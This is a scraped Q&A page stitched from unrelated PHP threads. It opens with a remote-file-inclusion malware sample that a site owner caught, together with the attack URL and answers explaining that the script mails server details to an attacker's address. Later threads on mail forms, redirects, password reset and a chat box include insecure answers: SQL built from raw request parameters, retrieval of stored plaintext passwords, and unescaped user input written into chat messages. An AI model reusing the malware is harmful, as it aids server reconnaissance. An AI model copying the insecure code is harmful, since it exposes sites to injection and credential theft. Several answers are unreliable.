Someone out here is trying to flood my website with some script. Luckily my application caught it.
I just want to know what this code is doing,
<script>
<!--
document.write(unescape("<?php
//=================================
//
// scan inb0x hotmail v3.0
//
// coded by FilhOte_Ccs and LOST
// re-c0d3d by delet
//
//
//=================================
//
ini_set("max_execution_time",-1);
set_time_limit(0);
$user = #get_current_user();
$UNAME = #php_uname();
$SafeMode = #ini_get('safe_mode');
if ($SafeMode == '') { $SafeMode = "OFF"; }
else { $SafeMode = " $SafeMode "; }
$delet=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$dados=("<b>Produto</b> = " . $UNAME . "
<i>Seguran?a</i> = " . $SafeMode . "
http://" . $delet . "
Muito obrigado por comprar o hehe1 com: <u>delet</u>");
$email = "inbox200905#hotmail.com";
$assunto = "lup#";
$email1 = "inbox200905#hotmail.com";
$headers = "From: <$email>\r\n";
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
if(mail($email1,$assunto,$dados,$headers)){
echo "Isso, ja foi!";
exit();
}
else{
echo "N?o foi.";
exit();
}
?>
"));
//-->
</script>
He was trying to do something like this: mysite/index.php?dll=http://www.forms.dgpj.mj.pt/box2.txt?.
http://evilcodecave.blogspot.com/2009/08/rfi-malware-analysis-ascrimez-kit.html
This is a notification script, that is
used ... to send notification mails to
attackers, to find more vulnerable
servers :)
EDIT: As Greg Hewgill pointed out in a comment, the fact that this has the potential to run, even if there is nothing useful to report, is a concern that shouldn't be taken lightly.
It looks like it's trying to harvest "$SafeMode" stats, for possible exploit use in the future:
...
$dados=("<b>Produto</b> = " . $UNAME . " // server/OS info
<i>Seguran?a</i> = " . $SafeMode . " // is PHP safe mode off? on? what?
http://" . $delet . " // full request URI
...
$email = "inbox200905#hotmail.com"; // who is harvesting
...
if(mail($email1,$assunto,$dados,$headers)){ // harvest via. mail
Dolt fails to mail back the user he looked up. Weak sauce.
Looks like this script only gathering and sending some info to inbox200905#hotmail.com address:
Name of the user who executes php scripts on the server
Name of operation system, which is installed on the server
Is php safe mode enabled
Also its url and script name
I think this script is only used for finding servers which can be used for attack.
Related
This is my contact-form-handler.php file. After clicking submit button, I want an alert in PHP. I am receiving Mail successfully and redirect to my main page but without an alert message. How can I use the alert box in PHP?
My form is working fine, but this time I stucked in this simple task.
<?php
if(isset($_POST['submit'])){
//$companyMail = 'enesh#gmail.com';
$to = "eneshpal#gmail.com"; // this is your Email address
$customerMail = $_POST['formEmail']; // this is the sender's Email address
$first_name = $_POST['formFirstName'];
$last_name = $_POST['formLastName'];
$phone = $_POST['formPhone'];
$text = $_POST['formText'];
/* foreach($_POST['project_type'] as $project_type_value){} */
$projectType = implode(', ',$_POST['project_type']);
$scopeProject = implode(', ',$_POST['scope_project']);
$project_type_Str = 'Project Type : '.$projectType;
$scope_project_Str = 'Scope of Project : '.$scopeProject;
$subject = "Form Submission";
$message = "Hi, \n\n";
$message .= "First Name: ".$first_name . "\nLast Name: " . $last_name . " \nEmail: " . $customerMail . " \nPhone : " . $phone . "\nDescription: " . $text . "\n";
$message .= $project_type_Str."\n";
$message .= $scope_project_Str;
//$message2 = "Here is a copy of your message " . $first_name . "\n\n" . $_POST['message'];
//$headers = "From:" . $companyMail;
//$headers2 = "From:" . $to;
if(mail($to,$subject,$message)){
//echo 'Mail Sent';
//$message = "Thanks, We Will Contact you Shortly";
//echo "<script type='text/javascript'>alert('$message');</script>";
echo "<script>alert('Thanks, We Will Contact you Shortly');</script>";
header('Location:get_estimation.php');
}else{
echo 'Mail Not Sent';
}
//mail($from,$subject2,$message2,$headers2); // sends a copy of the message to the sender
/*if( "Mail Sent. Thank you " . $first_name . ", we will contact you shortly.")
else die; */
// You can also use header('Location: thank_you.php'); to redirect to another page.
}
?>
In your case it would be better to redirect the user
header('Location:get_estimation.php?success=true');
and pass a GET-parameter.
When the GET-Parameter is set it will display what you want on your get_estimation.php-page
There are many problems with your script, but to answer your key question... you are echo'ing out the javascript code for an alert(), which will in turn prevent your php header('Location:get_estimation.php'); from executing because there has already been output sent to the browser before header was called. See here for more info.
Remember that header() must be called before any actual output is sent, either by normal HTML tags, blank lines in a file, or from PHP. It is a very common error to read code with include, or require, functions, or another file access function, and have spaces or empty lines that are output before header() is called. The same problem exists when using a single PHP/HTML file.
As per your comment above...
Yes Sir I want just just wish to render a success message after the form has been submitted?
To give you an example of how to achieve what you need for this...
<?php
if (!empty($_GET['success'])) {
echo 'Thanks, we will contact you shortly';
exit;
}
if (isset($_POST['submit'])) {
$to = "eneshpal#gmail.com";
$customerMail = $_POST['formEmail'];
$first_name = $_POST['formFirstName'];
$last_name = $_POST['formLastName'];
$phone = $_POST['formPhone'];
$text = $_POST['formText'];
$projectType = implode(', ', $_POST['project_type']);
$scopeProject = implode(', ', $_POST['scope_project']);
$project_type_Str = 'Project Type : ' . $projectType;
$scope_project_Str = 'Scope of Project : ' . $scopeProject;
$subject = "Form Submission";
$message = "Hi, \n\n";
$message .= "First Name: " . $first_name . "\nLast Name: " . $last_name . " \nEmail: " . $customerMail . " \nPhone : " . $phone . "\nDescription: " . $text . "\n";
$message .= $project_type_Str . "\n";
$message .= $scope_project_Str;
if (mail($to, $subject, $message)) {
header('Location: get_estimation.php?success=1');
exit;
} else {
echo 'Mail Not Sent';
exit;
}
}
To explain, you should not be using a browser-native javascript alert rendered from php to pop-up and notify the user of a form submission success, especially immediately after a redirect. It's just a bad user experience, it hijacks the browser window until they click ok on it and you cannot really style native alert windows etc.
Instead you should redirect with a success GET variable after the mail is sent successfully (back to the original page, presuming that is get_estimation.php in my example - but you can redirect elsewhere to another script). Then you can detect the presence of this variable in the script redirected to and show an appropriate message etc.
echo "Thank You,will contact you soon";
echo "<script>setTimeout(\"location.href = 'get_estimation.php';\",3000); </script>";
Please be aware I am not very familiar with JavaScript and I am doing this to help out a coworker.
I am trying to make an edit to the contact form automatic email replies. The change I am looking to make is when a person sends an email to someone on the website a reply is sent back to the person stating "This is a copy of the following message you sent to WEBSITE PERSON via WEBSITE NAME." The person receiving the email only gets the name of the person that sent it and the message.
I need to add the "This is a copy of the following message you sent to WEBSITE PERSON via WEBSITE NAME" message to the other email because one person is receiving all emails and sending them to the appropriate person. I know, this sounds unreasonable but it is what has been requested.
I found the code in contact.php but I am not entirely sure how to make the change.
This is where the code is getting the portion that I need:
// Check whether email copy function activated
if ($copy_email_activated == true && !empty($data['contact_email_copy']))
{
$copytext = JText::sprintf('COM_CONTACT_COPYTEXT_OF', $contact->name, $sitename);
$copytext .= "\r\n\r\n" . $body;
$copysubject = JText::sprintf('COM_CONTACT_COPYSUBJECT_OF', $subject);
$mail = JFactory::getMailer();
$mail->addRecipient($email);
$mail->addReplyTo($email, $name);
$mail->setSender(array($mailfrom, $fromname));
$mail->setSubject($copysubject);
$mail->setBody($copytext);
$sent = $mail->Send();
}
return $sent;
}
}
And I need the above to work with
// Prepare email body
$prefix = JText::sprintf('COM_CONTACT_ENQUIRY_TEXT', JUri::base());
$body = $prefix . "\n" . $name . ' <' . $email . '>' . "\r\n\r\n" . stripslashes($body);
// Load the custom fields
if (!empty($data['com_fields']) && $fields = FieldsHelper::getFields('com_contact.mail', $contact->email_to, true, $data['com_fields']))
{
$output = FieldsHelper::render(
'com_contact.mail',
'fields.render',
array(
'context' => 'com_contact.mail',
'item' => $contact,
'fields' => $fields,
)
);
if ($output)
{
$body .= "\r\n\r\n" . $output;
}
}
$mail = JFactory::getMailer();
$mail->addRecipient($contact->email_to);
$mail->addReplyTo($email, $name);
$mail->setSender(array($mailfrom, $fromname));
$mail->setSubject($sitename . ': ' . $subject);
$mail->setBody($body);
$sent = $mail->Send();
I thought it would be as simple as copying some code around but I am was very wrong. I knwo there are overrides in Joomla to prevent core code from being touched. As soon as I can get this figured out I can do the override to properly add my changes.
Thank you in advance!
Sorry, i used mobile so it hard to check
// Check whether email copy function activated if ($copy_email_activated == true && !empty($data['contact_email_copy'])) { $copytext = JText::sprintf('COM_CONTACT_COPYTEXT_OF', $contact->name, $sitename); $copytext .= "\r\n\r\n" . $body; $copysubject = JText::sprintf('COM_CONTACT_COPYSUBJECT_OF', $subject);
// Load the custom fields if (!empty($data['com_fields']) && $fields = FieldsHelper::getFields('com_contact.mail', $contact->email_to, true, $data['com_fields'])) { $output = FieldsHelper::render( 'com_contact.mail', 'fields.render', array( 'context' => 'com_contact.mail', 'item' => $contact, 'fields' => $fields, ) ); if ($output) { $copytext .= "\r\n\r\n" . $output; } }
$mail = JFactory::getMailer(); $mail->addRecipient($email); $mail->addReplyTo($email, $name); $mail->setSender(array($mailfrom, $fromname)); $mail->setSubject($copysubject); $mail->setBody($copytext); $sent = $mail->Send(); } return $sent; } }
I'm wondering if it's possible to have a user click on a 'forgot password' link that will email them their password which has been set in localStorage.
I know how to set and get in localStorage, i just need to know how to email what I get to the user, who has entered his email into a form field.
Your thoughts are much appreciated. Thanks!
You are never supposed to send passwords, even to the email the user has on file. It should always be a reset password link redirect that you send. Also, localStorage isn't the proper place for information of that sort. You are going to want to implement a database to achieve the information protection you're looking for.
Localstorage works a lot like cookies. (but they are not the same)
Don't get me wrong localstorage was a phenominal update for modern browsers. Now, developers can easily load massive applications without having to store chunks in files on the server! It is advised not to store secure information such as a users password in the localstorage.
Instead generate a random MD5 hash key set up as an authorizing key for a script.
Have a script in PHP set up to return a password for an account associated with the authorizing key & username. Remember to reset the key after to authorization is made.
Database:
| ID | Username | Password | Email | Key |
| 1 | John | secret | john#gmail.com | 0cc175b9c0f1b6a831c399e269772661 |
For your PHP i would recommend you look into PHP::PDO http://php.net/manual/en/book.pdo.php
PHP: (forgot_password.php)
<?PHP
if(isset($_GET['key']) && isset($_GET['username'])){
$connect = new PDO('mysql:host=localhost;dbname=' . /* DB NAME */,/*DB USERNAME*/, /* DB PASSWORD */);
$user = getall($connect, /* TABLE NAME */,
array(
'PASSWORD'
),
array(
'key'=>$_GET['key'],
'username', $_GET['username']
), 1,
array(
'ASC'=>'ID'
);
);
print_r($user); // i will print so you can figure out how to use this for your needs
$connect = null; //close connection
}
function getall($connect, $table, $values, $conditions = null, $limit = null, $ascdesc = null){
$values_str = "";
foreach($values as $key => $value){
$values_str .= $value . ", ";
}
$cond_str = "";
$hascond = false;
if($conditions != null){
$hascond = true;
foreach($conditions as $key => $value){
$cond_str .= $key . "='" . $value . "' AND ";
}
$cond_str = rtrim($cond_str, " AND ");
}
$values_str = rtrim($values_str, ", ");
$cond_str = " WHERE (" . $cond_str . ")";
$orderby = "";
$hasorder = false;
if($ascdesc != null){
$hasorder = true;
foreach($ascdesc as $key => $value){
$orderby = " ORDER BY " . $value . " " . $key;
break;
}
}
$sql = "SELECT " . $values_str . " FROM " . $table . " " . (($hascond)? $cond_str: "") . (($hasorder)? $orderby: "") . (($limit)? " LIMIT " . $limit: "");
//echo $sql;
$sql_prep = $connect->prepare($sql);
$sql_prep->execute();
return $result = $sql_prep->fetchAll(PDO::FETCH_ASSOC);
}
?>
When a user clicks the forgot password have them type in their username and email a link to the email on file with the associated user:
http://www.example.com/forgot_password.php?username=John&key=0cc175b9c0f1b6a831c399e269772661
Side note
It is Highly insecure to store passwords without hashing (many call this encryption but hashing and Encryption are entirely different) I suggest you store your passwords using password_hash read more at: http://php.net/manual/en/function.password-hash.php
I advise making the user change their password once they are authorized on the forgot_password.php script.
Your question asked how to send an email.
In order to send emails from your server you need to make sure your apache settings are configured correctly. Here is a post on stackoverflow that addresses this locally: send mail from local apache server
Once your configuration is set up correctly you can run this php function:
function send_email($subject, $msg, $to, $from){
$from - strip_tags($from);
$to = strip_tags($to);
$message = $msg;
$headers = "From: " . $from . "\r\n";
$headers .= "Reply-To: ". $from . "\r\n";
$headers .= "X-Confirm-Reading-To:" . $from . "\r\n";
$headers .= "Mailed-By:" . $from . "\r\n";
$headers .= "Disposition-Notification-To:" . $from . "\r\n";
$headers .= "Return-Receipt-To:" . $from . "\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-Type: text/html; charset=ISO-8859-1\r\n";
if(mail( $to, $subject, $message, $headers ))
return true;
return false
}
I also want to add that if you are hoping to save a users login information this is done over the server and not on the client side. Append your form with a remember me check box. Have your PHP check if the text box is checked, if it is then store the users ID in a database table for remembered users.
You should also make PHP store at least 5 random unique hashes into a cookies, to server as a key for accessing the remembered information. Have our website check to see if the cookies exist & if they do match them up with your database table & pull the user id.
This script is driving me up the wall. It's a simple submission form. I click the "submit" button and the email with all the submitted information is generated perfectly fine.
But I can't get the button to then redirect me to the "Thank You" page.
I've tried PHP, I've tried Javascript, I've even tried good old fashioned Meta Redirect. Nothing works.
// create email headers
$headers = 'From: '.$email_from."\r\n".
'Reply-To: '.$email_from."\r\n" .
'X-Mailer: PHP/' . phpversion();
mail($email_to, $email_subject, $email_message, $headers);
header("location:http://amvleague.vitaminh.info/thankyou.html")
}
die();
?>
I've tried putting the "header" part at the top of the document. I've tried changing it to:
echo '<script>document.location="page2.html"; </script>';
I've generated so many emails with this script that gmail is now sending them all to spam. And I can't get the damn thing to redirect.
If anyone can help before I claw my eyes out, it would be much obliged. ^_^;;
EDIT: I've tried everything you've all suggested. It's as if the script just flat-out refuses to execute anything that comes after the mail command. Could there be a reason for this?
EDIT 2: Still nothing's working.
Here's the entire script (with Rolen Koh's modifications). Is there something hidden in here that is preventing the script from accessing anything that comes after the mail tag?
<?php
if(isset($_POST['email'])) {
$email_to = "pathos#vitaminh.info";
$email_subject = "BelleCON 2014 - AMV League Submission";
function died($error) {
// your error code can go here
echo "We are very sorry, but there were error(s) found with the form you submitted. ";
echo "These errors appear below.<br /><br />";
echo $error."<br /><br />";
echo "Please go back and fix these errors.<br /><br />";
die();
}
// validation expected data exists
if(!isset($_POST['first_name']) ||
!isset($_POST['last_name']) ||
!isset($_POST['handle']) ||
!isset($_POST['amv_title']) ||
!isset($_POST['amv_song']) ||
!isset($_POST['amv_artist']) ||
!isset($_POST['amv_anime']) ||
!isset($_POST['amv_link']) ||
!isset($_POST['amv_category']) ||
!isset($_POST['email'])) {
died('We are sorry, but there appears to be a problem with the form you submitted.');
}
function IsChecked($chkname,$value)
{
if(!empty($_POST[$chkname]))
{
foreach($_POST[$chkname] as $chkval)
{
if($chkval == $value)
{
return true;
}
}
}
return false;
}
$first_name = $_POST['first_name']; // required
$last_name = $_POST['last_name']; // required
$handle = $_POST['handle']; // not required
$amv_title = $_POST['amv_title']; // required
$amv_song = $_POST['amv_song']; // required
$amv_artist = $_POST['amv_artist']; // required
$amv_anime = $_POST['amv_anime']; // required
$amv_link = $_POST['amv_link']; // required
$amv_category = $_POST['amv_category']; // required
$email_from = $_POST['email']; // required
$error_message = "";
$email_exp = '/^[A-Za-z0-9._%-]+#[A-Za-z0-9.-]+\.[A-Za-z]{2,4}$/';
if(!preg_match($email_exp,$email_from)) {
$error_message .= 'The Email Address you entered does not appear to be valid.<br />';
}
$string_exp = "/^[A-Za-z .-]+$/";
if(!preg_match($string_exp,$first_name)) {
$error_message .= 'The First Name you entered does not appear to be valid.<br />';
}
if(!preg_match($string_exp,$last_name)) {
$error_message .= 'The Last Name you entered does not appear to be valid.<br />';
}
if(strlen($error_message) > 0) {
died($error_message);
}
$email_message = "Form details below.\n\n";
function clean_string($string) {
$bad = array("content-type","bcc:","to:","cc:","href");
return str_replace($bad,"",$string);
}
$email_message .= "Name: ".clean_string($first_name).clean_string($last_name)."\n";
$email_message .= "Handle: ".clean_string($handle)."\n";
$email_message .= "Email: ".clean_string($email_from)."\n";
$email_message .= "Title of AMV: ".clean_string($amv_title)."\n";
$email_message .= "Category: ".clean_string($amv_category)."\n";
$email_message .= "Song: ".clean_string($amv_song)." by ".clean_string($amv_artist)."\n";
$email_message .= "Anime Used: ".clean_string($amv_anime)."\n\n";
$email_message .= clean_string($amv_link)."\n";
// create email headers
$headers = 'From: '.$email_from."\r\n".
'Reply-To: '.$email_from."\r\n" .
'X-Mailer: PHP/' . phpversion();
$mail = mail($email_to, $email_subject, $email_message, $headers);
if($mail)
{
header("location:http://amvleague.vitaminh.info/thankyou.html");
}
}
}
?>
You can use the header() function to send a new HTTP header, but this must be sent to the browser before any HTML or text (so before the <!DOCTYPE ...> declaration, for example).
try this,this is what I am using
function redirect($url){
if (headers_sent()){
die('<script type="text/javascript">window.location.href="' . $url . '";</script>');
}else{
header('Location: ' . $url);
die();
}
}
Try this:
$mail = mail($email_to, $email_subject, $email_message, $headers);
if($mail)
{
header("location:http://amvleague.vitaminh.info/thankyou.html");
}
Also semi-colon is missing in your header("location:http://amvleague.vitaminh.info/thankyou.html") line but i guess it is typo error.
use location.href
echo '<script>window.location.href="page2.html"; </script>';
The window.location object can be written without the window prefix.
The line
header("location:http://amvleague.vitaminh.info/thankyou.html")
Needs to be
header("Location: http://amvleague.vitaminh.info/thankyou.html");
Note the capital "L", the space after the colon, and the semicolon at the end.
If this does not resolve your issue, then you have an issue in some other piece of code. To find it, you might try looking at the php error log. If you have access to the server, you can find this by using any of the following resources for your particular server.
http://www.cyberciti.biz/faq/error_log-defines-file-where-script-errors-logged/
Where does PHP store the error log? (php5, apache, fastcgi, cpanel)
Where can I find error log files?
If you are on a shared host, they might have some non-standard location for this file, in which case, it might be easiest to contact them and ask where their standard location of the php error log is.
I'm creating an online chat box for me and my friends at college to use online. In the current configuration, the chat messages are stored in a plain text file on the host machine (mine) and are fetched via AJAX every second, however, sometimes it is slow and glitchy and doesn't always work.
To send a message, it passes the message to a JavaScript function which passes the value to a PHP script, writing it to the file along with the user's unique color (stored in a local cookie). Here's the functions.js file (pastebin): http://pastebin.com/CpGxj5cP
Here's the php file to send the message:
<?php
session_start();
require_once('mysql_connect.php');
date_default_timezone_set("EST");
//Format the message
$date = date('n/j g:i A');
$username = $_SESSION['username'];
$color = $_COOKIE[$username];
$message = "<font color='" . $color . "'>" . $username . "</font> (" . $date . "): ";
$message .= $_GET['m'] . "\n";
$file = '../messages.txt';
$handle = fopen($file, 'a');
fputs($handle, $message);
fclose($handle);
//Reset timeout
//$_SESSION['timeout'] = 300;
?>
As I said above, the issue is that it's very very slow. If there's a way to do it better than a textfile/AJAX, please let me know!
Yes there is a better way if you are using a browser that supports HTML 5
Web Sockets
http://www.tutorialspoint.com/html5/html5_websocket.htm
Check this out for a full code of a chat box using PHP. Download the source code or see the live demo in this site.
Moderator note: This link is no longer alive, and archive.org does not seem to have a copy, either.
http://purpledesign.in/blog/?p=19
function getLoginBox() {
ob_start();
require_once('login_form.html');
$sLoginForm = ob_get_clean();
$sLogoutForm = 'logout';
if ((int)$_REQUEST['logout'] == 1) {
if (isset($_COOKIE['member_name']) && isset($_COOKIE['member_pass']))
$this->simple_logout();
}
if ($_REQUEST['username'] && $_REQUEST['password']) {
if ($this->check_login($_REQUEST['username'], MD5($_REQUEST['password']))) {
$this->simple_login($_REQUEST['username'], $_REQUEST['password']);
return 'Hello ' . $_REQUEST['username'] . '! ' . $sLogoutForm;
} else {
return 'Username or Password is incorrect' . $sLoginForm;
}
} else {
if ($_COOKIE['member_name'] && $_COOKIE['member_pass']) {
if ($this->check_login($_COOKIE['member_name'], $_COOKIE['member_pass'])) {
return 'Hello ' . $_COOKIE['member_name'] . '! ' . $sLogoutForm;
}
}
return $sLoginForm;
}
}
Of course you will need to create a log in box. Kindly check the link I have shared. It has all the details